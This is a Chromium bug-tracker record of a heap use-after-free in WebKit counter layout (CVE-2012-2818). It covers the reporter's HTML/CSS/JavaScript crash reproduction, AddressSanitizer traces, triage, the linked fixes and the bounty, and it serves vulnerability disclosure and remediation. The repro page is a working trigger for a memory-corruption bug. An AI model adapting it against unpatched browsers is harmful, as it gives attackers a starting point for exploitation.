New issue
Advanced search Search tips
Note: Color blocks (like or ) mean that a user may not be available. Tooltip shows the reason.
Starred by 1 user

Issue metadata

Status: Fixed
Owner:
Closed: Dec 2012
Cc:
Components:
EstimatedDays: ----
NextAction: ----
OS: All
Pri: 1
Type: Bug-Security

Restricted
  • Only users with EditIssue permission may comment.



Sign in to add a comment
link

Issue 120944: Use-after-free due to issues in counter layout.

Reported by miau...@gmail.com, Mar 29 2012

Issue description

VULNERABILITY DETAILS

use-after-free in WebCore::RenderObject::container

VERSION
Chrome Version: stable, beta, dev

Chromium	19.0.1085.0 (Developer Build 129583)
OS	Linux
WebKit	536.5 (@112458)

Operating System: linux 64bit

REPRODUCTION CASE
<html>
  <head>
    <style>
      #el0 {
        -webkit-animation-name: a;
        -webkit-animation-duration: 1s;
        counter-reset: c;
      }
      #el0::before {
        content: counter(c);
        counter-reset: c;
        width: 1px;
        height: 1px;
        overflow-x: scroll;
        display: block;
      }
      #el0::after {
        counter-reset: c;
        display: table-header-group;
        content: counter(c);
      }
      #el2 {
        counter-reset: c;
      }
      #el3::before {
        content: counter(c);
      }
    </style>
    <script>
      onload = function() {
        el0=document.createElement('div')
        el0.setAttribute('id','el0')
        document.body.appendChild(el0)
        el1=document.createElement('div')
        document.body.appendChild(el1)
        el2=document.createElement('div')
        el2.setAttribute('id','el2')
        el1.appendChild(el2)
        el3=document.createElement('div')
        el3.setAttribute('id','el3')
        document.body.appendChild(el3)
      }
    </script>
  </head>
  <body>
  </body>
</html>


FOR CRASHES, PLEASE INCLUDE THE FOLLOWING ADDITIONAL INFORMATION
Type of crash: tab + asan
Crash State: 

==16346== ERROR: AddressSanitizer heap-use-after-free on address 0x7fffeca75098 at pc 0x55555ac88045 bp 0x7fffffff9100 sp 0x7fffffff90f8
READ of size 8 at 0x7fffeca75098 thread T0
    #0 0x55555ac88045 in WebCore::RenderObject::container(WebCore::RenderBoxModelObject*, bool*) const ???:0
    #1 0x55555ac86e99 in WebCore::RenderObject::markContainingBlocksForLayout(bool, WebCore::RenderObject*) ???:0
    #2 0x55555a557d3a in WebCore::FrameView::scheduleRelayout() ???:0

0x7fffeca75098 is located 24 bytes inside of 184-byte region [0x7fffeca75080,0x7fffeca75138)
freed by thread T0 here:
    #0 0x55555de50f32 in free ??:0
    #1 0x55555aca5bc2 in WebCore::RenderObjectChildList::updateBeforeAfterContent(WebCore::RenderObject*, WebCore::PseudoId, WebCore::RenderObject const*) ???:0
    #2 0x55555aa389ec in WebCore::RenderBlock::styleDidChange(WebCore::StyleDifference, WebCore::RenderStyle const*) ???:0
 
24184.txt
9.6 KB View Download
24184.html
1.1 KB View Download
beta-24184.txt
9.4 KB View Download
stable-24184.txt
9.4 KB View Download

Comment 1 by infe...@chromium.org, Mar 29 2012

Labels: -Pri-0 -Area-Undefined Pri-1 Area-WebKit SecImpacts-Stable SecImpacts-Beta OS-All Mstone-18 Stability-AddressSanitizer SecSeverity-High
Status: Available

Comment 2 by kareng@google.com, Mar 30 2012

Labels: -Mstone-18 Mstone-20

Comment 3 by kareng@google.com, Mar 30 2012

Labels: MovedFrom18

Comment 4 by infe...@chromium.org, Mar 30 2012

Labels: -Mstone-20 -MovedFrom18 Mstone-18
Reverting wrong marking of security bugs by release management.

Comment 5 by infe...@chromium.org, Apr 1 2012

Summary: Use-after-free due to issues in counter layout.

Comment 6 by infe...@chromium.org, Apr 1 2012

Cc: lafo...@chromium.org
Weird, dupes are not showing here. Anthony, any idea what is going wrong with the issue tracker wrt security bugs.

1. http://code.google.com/p/chromium/issues/detail?id=121291
2. http://code.google.com/p/chromium/issues/detail?id=121290
3. http://code.google.com/p/chromium/issues/detail?id=115912
4. http://code.google.com/p/chromium/issues/detail?id=120222

Comment 7 by miau...@gmail.com, Apr 1 2012

:(

Comment 8 by infe...@chromium.org, Apr 2 2012

Cc: miau...@gmail.com
 Issue 108958  has been merged into this issue.

Comment 9 by scarybea...@gmail.com, Apr 2 2012

@inferno: did we mean to merge the older bug into this newer one?

Comment 10 by infe...@chromium.org, Apr 2 2012

Cc: -lafo...@chromium.org
We just have to keep all these counter bugs in one master bug. Since all others were duped against this one, i did the same for 108958. We can fix the credits later.

Comment 11 by scarybea...@gmail.com, Apr 2 2012

Owner: kenrb@chromium.org
Superstar Ken is looking at this one.

Comment 12 by scarybea...@gmail.com, Apr 2 2012

Status: Started

Comment 13 by infe...@chromium.org, Apr 3 2012

Cc: rniwa@chromium.org

Comment 14 by infe...@chromium.org, Apr 3 2012

Cc: jchaffraix@chromium.org kenrb@chromium.org infe...@chromium.org
 Issue 121128  has been merged into this issue.

Comment 15 by kenrb@chromium.org, Apr 3 2012

Cc: schenney@chromium.org

Comment 16 by schenney@chromium.org, Apr 3 2012

See http://code.google.com/p/chromium/issues/detail?id=120921 for a long discussion.

I think we are open to security issues with any text element (and maybe others) in a node that gets marked for layout during layout.

Comment 17 by kenrb@chromium.org, Apr 4 2012

Status: Assigned
I can go back to looking at counters after, but I've separated 108958 back out from this and I'm trying to fix that one first.

If anyone is inclined to steal this in the meantime feel free.

Comment 18 by kenrb@chromium.org, Apr 12 2012

Status: Started

Comment 19 by kenrb@chromium.org, Apr 12 2012

Summary: Heap-use-after-free in WebCore::RenderObject::container
Detailed report: https://cluster-fuzz.appspot.com/testcase?key=35921152

Uploader: kenrb@chromium.org

Crash Type: Heap-use-after-free READ 8
Crash Address: 0x7fcfe384a298
Crash State:
  - crash stack -
  WebCore::RenderObject::container
  WebCore::RenderObject::markContainingBlocksForLayout
  - free stack -
  WebCore::RenderObjectChildList::updateBeforeAfterContent
  WebCore::RenderBlock::styleDidChange
  

Unminimized Testcase: https://cluster-fuzz.appspot.com/download/AMIfv95T-wkB8UtINNejsfb36-TkqpWA9aLh6OfZrsYtvO5B53ynHEVDQhTRdjiYfyjkl9VtdKL3xvZFpNW_93uTJJIS8Qb_oiFTxTJ86TD_V47On1w2Po7OphkoePURwGgHMqu8g7egQ3m8eEuHl_GjiVqYhx8veA

Comment 20 by infe...@chromium.org, Apr 13 2012

Summary: Use-after-free due to issues in counter layout.
Renaming the bug title since it conflicts with another bug.

Comment 22 by infe...@chromium.org, Apr 22 2012

 Issue 124550  has been merged into this issue.

Comment 23 by infe...@chromium.org, May 6 2012

 Issue 126404  has been merged into this issue.

Comment 24 by infe...@chromium.org, May 16 2012

Labels: -Mstone-18 Mstone-19
m19 is out, moving milestone m18 bugs to m19.

Comment 25 by kenrb@chromium.org, May 18 2012

Status: Assigned

Comment 26 by kenrb@chromium.org, May 24 2012

These are the test cases that still repro at this point, aside from the first one that started this bug:
https://cluster-fuzz.appspot.com/testcase?key=30740098  (originally from  bug 120222 )

https://cluster-fuzz.appspot.com/testcase?key=43502492 (originally from  bug 126404 )

+ all the test cases from  bug 121128  but some of those repros are really hard to look at

Comment 27 by infe...@chromium.org, May 25 2012

Labels: -Restrict-View-SecurityTeam Restrict-View-SecurityNotify Merge-Approved
Status: FixUnreleased
http://trac.webkit.org/changeset/118452

Comment 28 by scarybea...@gmail.com, May 25 2012

Labels: -Mstone-19 Mstone-20 reward-topanel

Comment 29 by infe...@chromium.org, May 25 2012

Labels: -Merge-Approved
Status: Assigned
Reopening, needs a minor fix.

Comment 30 by infe...@chromium.org, May 25 2012

Labels: Merge-Approved
Status: FixUnreleased
Use this instead - http://trac.webkit.org/changeset/118542

Comment 31 by infe...@chromium.org, May 25 2012

Cc: dglazkov@chromium.org shinyak@chromium.org dominicc@chromium.org
 Issue 119087  has been merged into this issue.

Comment 32 by ClusterFuzz, May 28 2012

Project Member
ClusterFuzz has detected this issue as fixed in range 139082:139098.

Detailed report: https://cluster-fuzz.appspot.com/testcase?key=35921152

Uploader: kenrb@chromium.org

Crash Type: Heap-use-after-free READ 8
Crash Address: 0x7ff33660da98
Crash State:
  - crash stack -
  WebCore::RenderObject::container
  WebCore::RenderObject::markContainingBlocksForLayout
  - free stack -
  WebCore::RenderObjectChildList::updateBeforeAfterContent
  WebCore::RenderBlock::styleDidChange
  
Fixed: https://cluster-fuzz.appspot.com/revisions?range=139082:139098

Minimized Testcase: https://cluster-fuzz.appspot.com/download/AMIfv94FVj-ykvMa5QK5Gjo3n-OgSYnuNI3WBwius_ToiGfae7XTj-W93xH8UijqoAoU8zNmofoSb8bwWLCCUxm_Z8B5Kfa3JS-4aXQr1TFldPhHJJzDUAXvW2ZEl4p2BLJ0CJdOTnwRcfsflcnmbqkXnF7SDgBMcA

If you suspect that the result above is incorrect, try re-doing that job on the testcase report page.

Comment 33 by scarybea...@gmail.com, Jun 6 2012

Labels: -Merge-Approved Merge-Merged
M20: http://trac.webkit.org/changeset/119621

Comment 34 by scarybea...@gmail.com, Jun 22 2012

Labels: -reward-topanel reward-1000 reward-unpaid
$1000

Comment 35 by scarybea...@gmail.com, Jun 25 2012

Labels: CVE-2012-2818

Comment 36 by scarybea...@gmail.com, Jul 9 2012

Labels: -reward-unpaid

Comment 37 by bugdroid1@chromium.org, Oct 13 2012

Project Member
Labels: Restrict-AddIssueComment-Commit
This issue has been closed for some time. No one will pay attention to new comments.
If you are seeing this bug or have new data, please click New Issue to start a new bug.

Comment 38 by jsc...@chromium.org, Dec 20 2012

Status: Fixed

Comment 39 by bugdroid1@chromium.org, Mar 10 2013

Project Member
Labels: -Type-Security -Area-WebKit -SecImpacts-Stable -SecImpacts-Beta -Stability-AddressSanitizer -SecSeverity-High -Mstone-20 Cr-Content M-20 Security-Impact-Stable Security-Impact-Beta Performance-Memory-AddressSanitizer Type-Bug-Security Security-Severity-High

Comment 40 by bugdroid1@chromium.org, Mar 13 2013

Project Member
Labels: Restrict-View-EditIssue

Comment 41 by bugdroid1@chromium.org, Mar 14 2013

Project Member
Labels: -Restrict-AddIssueComment-Commit Restrict-AddIssueComment-EditIssue

Comment 42 by scarybea...@gmail.com, Mar 21 2013

Labels: -Restrict-View-SecurityNotify -Restrict-View-EditIssue

Comment 43 by bugdroid1@chromium.org, Mar 21 2013

Project Member
Labels: -Security-Severity-High Security_Severity-High

Comment 44 by bugdroid1@chromium.org, Mar 21 2013

Project Member
Labels: -Security-Impact-Stable Security_Impact-Stable

Comment 45 by bugdroid1@chromium.org, Mar 21 2013

Project Member
Labels: -Security-Impact-Beta Security_Impact-Beta

Comment 46 by bugdroid1@chromium.org, Apr 1 2013

Project Member
Labels: -Performance-Memory-AddressSanitizer Stability-Memory-AddressSanitizer

Comment 47 by bugdroid1@chromium.org, Apr 6 2013

Project Member
Labels: -Cr-Content Cr-Blink

Comment 48 by sheriffbot@chromium.org, Jun 14 2016

Project Member
Labels: -security_impact-beta

Comment 49 by sheriffbot@chromium.org, Oct 1 2016

Project Member
This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot

Comment 50 by sheriffbot@chromium.org, Oct 2 2016

Project Member
This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot

Comment 51 by mbarbe...@chromium.org, Oct 2 2016

Labels: allpublic

Comment 52 by awhalley@chromium.org, Apr 25 2018

Labels: CVE_description-submitted

Sign in to add a comment